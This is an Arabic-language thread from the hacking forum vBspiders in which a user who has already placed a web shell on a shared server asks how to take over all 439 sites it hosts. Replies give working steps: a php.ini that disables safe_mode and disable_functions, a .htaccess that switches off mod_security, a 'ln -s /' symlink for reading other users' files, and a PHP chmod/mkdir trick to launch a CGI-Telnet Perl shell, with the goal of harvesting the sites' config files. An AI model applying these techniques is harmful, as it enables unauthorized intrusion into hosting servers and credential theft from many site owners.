:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   [حل مشكلة] محترفين السيرفر فقط ؟ (http://www.vbspiders.com/vb/t62999.html)

خالد سعودي 06-25-2012 01:50 AM
محترفين السيرفر فقط ؟
 
بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته
كيف حالكم ياشباب
فضلا وليس امرا في سيرفر اخترقته ولم رجعت لي السيرفر اختراق موقع مرة ثانية رفعت الشل عليه ابي اختراق السيرفر كامل استعرض الملفات الكوفينق بعد عمل الاختصار txt تطلع المواقع لم افتح تطلع الصفحة الرئسية علما باني جربت كل الطرق عليه مانفع . ابي طريقة احترافية جدا اذكان ممكن
لكم بعض المعلومات
There are : [ 439 ] Domain موقع
PHP النسخة 5.2.17
السرفيرSoftware: Apache/2.2.22 (Unix)
السيف مودSafe-mode: OFF (no secure)
الدوال المعطله
disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid,symlink"
;disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid"
;disable_functions = "system,dlopen,popen,passthru,proc_open,proc_close ,dl,escapeshellcmd,proc_nice,system_exec,shell_exe c,exec,fpassthru,crack_check,crack_closedict,crack _getlastmessage,crack_opendict,psockopen,php_ini_s canned_files,hell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,syste mroot,server_software,get_current_user,HTTP_HOST,i ni_restore,popen,pclose,exec,shell_exec,suExec,pas sthru,proc_open,proc_nice,proc_terminate,proc_get_ status,proc_close,leak,apache_child_terminate,posi x_kill,posix_mkfifo,posix_setpgid,posix_setsid,pos ix_setuid,escapeshellcmd,escapeshellarg,posix_cter mid,posix_getcwd,posix_getegid,posix_geteuid,posix _getgid,posix_getgrgid,posix_getgrnam,posix_getgro ups,posix_getlogin,posix_getpgid,posix_getpgrp,pos ix_getpid,posix_getppid,posix_getpwnam,posix_getpw uid,posix_getrlimit,posix_getsid,posix_getuid,posi x_isatty,posix_setegid,posix_seteuid,posix_setgid, posix_times,posix_ttyname,posix_uname,posix_access ,posix_get_last_error,posix_mknod,posix_strerror,p osix_initgroups,posix_setsidposix_setuid,symlink"

شباب لو معليكم امر ابي طريقة اخترافية جدا تكون مرتبة
انا في انتظاركم يامحترفين
فمان الرحمن

bleu moon 06-25-2012 02:48 AM
رد: محترفين السيرفر فقط ؟
 
ارفع ملف php.ini

يكون محتواه

safe_mode = OFF

disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF

خالد سعودي 06-25-2012 03:39 AM
رد: محترفين السيرفر فقط ؟
 
شكرا لك ياغالي ولكن وين الرفعه على مسار الشل او في مجلد الاختصار
انا رفعت على مسار الشل ابي ستغرضها ما يفتح معي ؟

Sn4Ke'z 06-25-2012 09:36 AM
رد: محترفين السيرفر فقط ؟
 
هههه موفق باذن الله في اختراق رزمة من المواقع و لا تنساني بالاندكس لوول

MaFia 06-25-2012 02:17 PM
رد: محترفين السيرفر فقط ؟
 
1 مرفق
بسم الله ما شاء الله
الدوال الممنوعه :D \

ارفع الشل المرفق
هو وملف
.htaccess

فى مجلد لوحدهم
وبعدها اعمل ملف جديد بأسم
vbspiders.php
وحط جواه الكود
<? chmod("vbspiders.nEx",0755) ?>

وارفعه داخل مجلد الشل المرفق +
استعرض ملف البي اتش بي من المتصفح
localhost/vbspiders.php
هتلاقي صفحه بيضه

بعدها استعرض الشل المرفق
localhost/vbspiders.nEx

وادخل فى خانة الباسورد
vbspiders
وطبق اوامر بدون اي مشاكل

bleu moon 06-25-2012 02:45 PM
رد: محترفين السيرفر فقط ؟
 
لو بدك تعمل اختصار للسيرفر

mkdir test
cd test
ارفع .htaccess
اقتباس:
<Files *.php>
ForceType application/x-httpd-php4
</files>
<IfModule mod_security.c>
SecFilterEngine off
SecFilterScanPOST off
</IfModule>
ln -s / 1.php

الآن استعرض 1.php

test/1.php/home/us3r/public_html

خالد سعودي 06-25-2012 03:32 PM
رد: محترفين السيرفر فقط ؟
 
هلا بك ياغالي عندما حملة الملف لي في المرفقات حصلت vb.php. vbspiders.nEx الهتكس غير موجود
عموما رفعت htaccess عندي في مجلد وبعدين رفعت vb.php من الشل لموقع فتحها حصل موجود الكود برفع الملف في مجلد الشل vbspiders.nEx مايرفع معي رحت رفعته من من الشل . استعرضت vb.php تطلع صفحة بيضاء ومن ثم استعرضت vbspiders.nEx تطلع اول الصفحة #!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
ملاحظة تري هذا ماني فاهمه
وادخل فى خانة الباسورد
vbspiders
وطبق اوامر بدون اي مشاكل
-------------------------
يعني نفيذ الامرcat /etc/xxxx.com
من احد الموقع احد الموقع في السيرفر ستبدالة في xxxx انا سويت كذا صح ام خطا نفذت الامر بس طلع مافي شي
على فكرة تري vbspiders.php وvbspiders.nEx
على نفس مسار الشل لي رفع عليه الموقع
انا في انتظارك

خالد سعودي 06-25-2012 03:44 PM
رد: محترفين السيرفر فقط ؟
 
nor15din
ماكو فائدة

MaFia 06-25-2012 10:56 PM
رد: محترفين السيرفر فقط ؟
 
اقتباس:
#!/usr/bin/perl
ارفع الهتاكس المرفق مع الشل يا غالي فى مجلد لوحدهم

طبعا انت مش هتعرف تعمل مجلد جديد .. هنعتد على دالة
mkdir
لانها مش ممنوعه ومن خلالها نقدر نعمل مجلد
اعمل ملف جديد على جهازك بأسم
name.php
وحط بداخله الكود
<?php
mkdir("vbspiders");
?>
وارفعه مثلا فى الرئسيه
public_html

واستعرضه
localhost/name.php
بتجد صفحة بيضه
بعدها ارجع للشل بتجد مجلد بأسم
vbspiders
وتابع الخطوات
ارفع شل البيرل
ثم ملف الهتاكس المرفق مع الشل
+
ملف vb.php
لان ملف vb.php
بيصرح شل البيرل
تصريح 755
ودالة chmod
الخاصة بتصريح الملفات والمجلدات
مش ممنوعه
والحياه عسسسسسسل
جرب واعطينا نتيجة
لوول

خالد سعودي 06-25-2012 11:44 PM
رد: محترفين السيرفر فقط ؟
 
اخي الكريم بعرف اوامر الينكس لان جهازي الينكس ولكن ممكن هنا خطا ليت تضيفني عندك برسلك ايميلي

MaFia 06-25-2012 11:54 PM
رد: محترفين السيرفر فقط ؟
 
اللهم يزيدك يا غالي

انا شرحت لك طريقة استغلال الدوال الغير ممنوعه .. ممكن تفيدك او تفيد غيرك
ولو تطرح الخطا اللي ظهر معك مافي مشاكل لكي الجميع يستفاد ..

خالد سعودي 06-26-2012 06:08 AM
رد: محترفين السيرفر فقط ؟
 
طيب انا عطيتك الموقع طبق عليه صار معاك

MaFia 06-26-2012 03:10 PM
رد: محترفين السيرفر فقط ؟
 
المشكلة
من البداية مش من السيف مود لان الشل انا شوفته والسيف مود اوف
:shiny01:
واعذورني لان بقعد من كافيه نت والاميل بيفصل
كان فى موضوع حاطط فيه سكربت سحب كونفيجات السيرفر هحاول ابحث عنه
وارفقه لان شوفت اكواد السكربت
اللي انت شغال به مش تمام

خالد سعودي 06-26-2012 10:30 PM
رد: محترفين السيرفر فقط ؟
 
شكرا على جهودك ياغالي

MaFia 06-27-2012 12:30 AM
رد: محترفين السيرفر فقط ؟
 
بالتوفيق ان شاء الله وللافادة استعمل السكربت
اللي هنا
http://www.vbspiders.com/vb/t63040.html
http://r18.imgfast.net/users/1811/68...les/221706.gif


الساعة الآن 05:00 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0